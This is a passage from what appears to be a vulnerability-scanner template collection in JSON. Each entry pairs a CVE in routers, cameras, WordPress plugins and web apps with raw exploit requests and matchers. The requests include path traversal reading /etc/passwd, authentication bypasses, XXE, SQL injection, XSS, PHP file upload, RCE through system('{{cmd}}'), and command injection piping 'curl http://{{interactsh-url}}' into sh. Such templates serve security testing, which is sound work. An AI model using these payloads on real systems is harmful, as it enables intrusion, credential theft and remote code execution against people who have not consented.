HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true,\"session\"","id","params"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-35395","info":{"name":"RealTek Jungle SDK - Arbitrary Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/formWsc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40651","info":{"name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, \"openSIS\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24791","info":{"name":"Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2,\"Add New Snippet\")"],"condition":"and"}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/"],"condition":"and"}]},{"raw":["GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(header,'text/plain')","regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(header,'text/plain')","contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-26294","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<AdminLogin>","<AdminPassword>","<DBHost>"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0760","info":{"name":"Jakarta Tomcat 3.1 and 3.0 - Exposure","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Request Information","Path info","Server name","Remote address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 